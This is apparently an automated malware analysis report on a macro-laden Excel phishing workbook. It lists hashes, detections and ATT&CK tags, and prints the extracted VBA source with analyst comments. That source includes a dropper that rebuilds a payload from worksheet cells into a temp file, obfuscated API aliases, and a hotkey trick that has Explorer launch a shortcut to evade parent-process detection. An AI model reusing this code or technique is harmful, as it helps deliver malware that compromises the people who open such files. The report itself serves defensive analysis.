Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5235a0960cad3739…

MALICIOUS

Office (OOXML)

1.26 MB Created: 2021-09-15 17:08:55 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-25
MD5: 557b645d8329c2dbddc990cb73dca852 SHA-1: 15a2dc3a19ae47752f62e8b41f979e4c1032108d SHA-256: 5235a0960cad37393f621cebce9a288ec77e1f41c871c0649a99ad0e992babdd
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel OOXML workbook carrying a VBA project in which the heuristics found the auto-execution entry points AutoOpen, Workbook_Open and Auto_Open, so code runs as soon as macros are enabled; none of those handlers fall inside the truncated source preview below, so their bodies were not reviewed here. The ClamAV name 'Doc.Downloader.Generic-6698421-0' is a generic family label and should not be read as proof of a network download: in the visible source, routine `aa` reconstructs a payload from worksheet cells (Sheet1!A200:A345) and writes it to %TMP%\Doc1.docx, i.e. dropper behaviour with the payload carried inside the workbook, and routine `te` registers %TMP%\office13.lnk with the Explorer taskbar window (Shell_TrayWnd) and then synthesises a Ctrl+Alt+Shift+T keystroke, which appears intended to have explorer.exe launch the shortcut rather than spawning it as a child of Excel (parent-process evasion — confirm dynamically). The document body's 'mandatory training' text serves as a lure to get the user to enable macros.

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6665 bytes
SHA-256: cfd918143b97fffb354c15c1af42a70cc58f7c474d9cb8bc760b500b3548a7bf
Preview script
First 1,000 lines of the extracted script (this capture is cut off inside routine `aa`; the auto-exec handlers flagged above and any code that creates office13.lnk are not in the visible part)
Attribute VB_Name = "Module1"
' Win32 imports. Most are bound under short, meaningless aliases (fw, gaa, sm, ke, s)
' so the routine bodies never spell out FindWindowA / GlobalAddAtomA / SendMessageA /
' keybd_event / Sleep; the Alias clauses still carry the real export names, which is
' what static scanners key on. ReleaseDC, GetDeviceCaps, GetActiveWindow and GetDC are
' declared but not called anywhere in the visible listing.
#If VBA7 Then
Private Declare PtrSafe Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare PtrSafe Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare PtrSafe Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare PtrSafe Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
' SendMessageA: the last parameter is declared "g As Any" without ByVal, so each call
' site decides whether lParam is a pointer to a temporary or, with an explicit ByVal,
' the raw value (compare te() and boo()).
Private Declare PtrSafe Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare PtrSafe Function GetActiveWindow Lib "user32" () As Long
Private Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare PtrSafe Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#Else
' NOTE(review): this pre-VBA7 branch still uses LongPtr, a type introduced with VBA7,
' so on the legacy Office builds it is meant for it would fail to compile; it looks
' like the VBA7 block was copied with only the PtrSafe keyword removed.
Private Declare Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare  Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare  Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare  Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare  Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare  Function GetActiveWindow Lib "user32" () As Long
Private Declare  Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare  Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare  Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#End If

' Module-level state. calVal is written by the decoy calculator handlers below;
' tmpVar is not referenced anywhere in the visible listing.
Public tmpVar As String
Public calVal As String

' Decoy: "backspace" handler of a calculator UserForm — drops the last character of
' txtRes. txtRes is not declared in this module (no Option Explicit, so it is an
' implicit Variant), and since this appears to be a standard module (VB_Name =
' Module1) the _Click procedure is not bound to any control. Nothing in the visible
' code calls it; presumably filler to make the module read as a benign calculator.
Private Sub cmdBtnBak_Click()
    If txtRes <> 0 And txtRes <> "" Then txtRes = Left(txtRes, Len(txtRes) - 1)
End Sub
' Decoy: calculator "+" handler — moves txtRes into txtdisplay, resets txtRes and
' records the pending operation in the module-level calVal. txtRes/txtdisplay are
' undeclared implicit Variants; not called by any visible routine.
Private Sub cmdBtnAdd_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Add"
    End If
End Sub
' Synthesises one Ctrl+Alt+Shift+T chord through keybd_event (via w()):
' virtual-key codes 17 = VK_CONTROL, 18 = VK_MENU (Alt), 16 = VK_SHIFT, 84 = 'T'.
' Second argument 0 = key down, 2 = KEYEVENTF_KEYUP; modifiers are pressed first and
' released last in reverse order. Called from te() immediately after the
' Shell_TrayWnd message whose wParam (0x754) encodes exactly this key combination.
Sub merge()
w 17, 0
w 18, 0
w 16, 0
w 84, 0
w 84, 2
w 16, 2
w 18, 2
w 17, 2
End Sub
' Decoy: calculator "/" handler, same shape as cmdBtnAdd_Click but stores "Divide"
' in calVal. Undeclared implicit Variants; not called by any visible routine.
Private Sub cmdBtnDvd_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Divide"
    End If
End Sub
' Decoy: calculator "." handler — appends a decimal point to txtRes via the + operator
' (string concatenation here, since "." is a string). Not called by any visible routine.
Private Sub cmdBtnDot_Click()
    If txtRes <> 0 Then txtRes = txtRes + "."
End Sub

' Sends WM_USER+234 (1258) to the Explorer taskbar window (class "Shell_TrayWnd")
' with wParam 1876 (0x754). The literal 0 goes through the ByRef "As Any" parameter,
' so lParam is a pointer to a temporary zero rather than 0 itself. te() sends the
' neighbouring WM_USER+233 with the same wParam before this runs, so this is
' presumably the matching unregister/cleanup step; both messages are undocumented
' Explorer internals — confirm in a sandbox. fw() returns 0 when no taskbar window
' exists and that is never checked.
Sub boo()
sm fw("Shell_TrayWnd", ""), 1024 + 234, 1792 + 84, 0
End Sub
' Decoy: calculator "*" handler, identical to cmdBtnAdd_Click except for the
' "Multiplication" tag written to calVal. Not called by any visible routine.
Private Sub cmdBtnMult_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Multiplication"
    End If
End Sub
' Decoy: calculator digit "1" handler — starts or extends txtRes with the button
' caption. cmdBtn1 and txtRes are not declared in this module; not called by any
' visible routine.
Private Sub cmdBtn1_Click()
    If txtRes = 0 Then
        txtRes = cmdBtn1.Caption
    Else
        txtRes = txtRes + cmdBtn1.Caption
    End If
End Sub
' Thin wrapper over keybd_event: w = virtual-key code, x = dwFlags (0 = press,
' 2 = KEYEVENTF_KEYUP); the scan code and extra-info arguments are always 0.
' The byte parameter reuses the Sub's own name, w — kept as extracted.
Sub w(ByVal w As Byte, ByVal x As Long)
    ke w, 0, x, 0
End Sub
' Decoy: calculator digit "4" handler, same shape as cmdBtn1_Click. Undeclared
' implicit Variants; not called by any visible routine.
Private Sub cmdBtn4_Click()
    If txtRes = 0 Then
        txtRes = cmdBtn4.Caption
    Else
        txtRes = txtRes + cmdBtn4.Caption
    End If
End Sub
' Decoy: calculator digit "5" handler, same shape as cmdBtn1_Click. Undeclared
' implicit Variants; not called by any visible routine.
Private Sub cmdBtn5_Click()
    If txtRes = 0 Then
        txtRes = cmdBtn5.Caption
    Else
        txtRes = txtRes + cmdBtn5.Caption
    End If
End Sub
' Core execution routine — the visible malicious logic. Steps:
'   1. Builds "%TMP%\office13.lnk". The literal is stored as "\office13|.|ln|k" and
'      the '|' separators stripped with Replace(), a cheap string-splitting
'      obfuscation that keeps ".lnk" out of the static source.
'   2. GlobalAddAtomA() puts that path in the global atom table and the 16-bit atom is
'      passed ByVal as lParam of WM_USER+233 (1257) to the Explorer taskbar window
'      "Shell_TrayWnd", with wParam 1876 = 0x754. Read as a Windows HOTKEYF value,
'      the low byte 0x54 is 'T' and the high byte 0x07 is SHIFT|CONTROL|ALT.
'   3. merge() then injects exactly that Ctrl+Alt+Shift+T chord via keybd_event,
'      s() sleeps 8950 ms, and boo() sends WM_USER+234 with the same wParam.
' The sequence is consistent with asking Explorer to register a hotkey for the
' shortcut and then firing it, so the shortcut target would be spawned by explorer.exe
' rather than as a child of EXCEL.EXE (defeats parent-process based detection) —
' confirm dynamically. Nothing in the visible listing writes office13.lnk; aa() writes
' %TMP%\Doc1.docx, so the .lnk creation is presumably in the truncated part of the
' module. No return value from fw()/gaa()/sm() is checked.
Sub te()
 sm fw("Shell_TrayWnd", ""), 1024 + 233, 1792 + 84, ByVal gaa(Environ("TMP") & Replace("\office13|.|ln|k", "|", ""))

merge
s 8950

 boo
End Sub
' Decoy: calculator "-" handler, same shape as cmdBtnAdd_Click but stores "Minus" in
' calVal. Undeclared implicit Variants; not called by any visible routine.
Private Sub cmdBtnMns_Click()
    If txtRes <> 0 Then
        txtdisplay = txtRes
        txtRes = 0
        calVal = "Minus"
    End If
End Sub

Sub aa()
Dim fn As String
fn = Environ("tmp") & "\Doc1.docx"
Dim pl As String
  For Each c In Worksheets("Sheet1").Range("A200:A345")
    pl = pl & c
   Next c
        
    

    Dim fh, i, j, z As Integer
    Dim bc As Long
    Dim b As Byte
    
    bc = 1
    i = 1
    j = 1
    fh = FreeFile

    Open fn For Binary Access Write As #fh
        Do
            j = InStr(i, pl, ",", 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 41984 bytes
SHA-256: e046724fe0ca7af2eedb3e321eaacd760cc256e8a9e1ce3f7f9b12c737f5e25a
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely (automated verdict — treat as a false negative: the extracted source shows single-letter API aliases, a '|'-split path string reassembled with Replace(), and routine `aa` rebuilding an embedded payload from worksheet cells into %TMP%\Doc1.docx)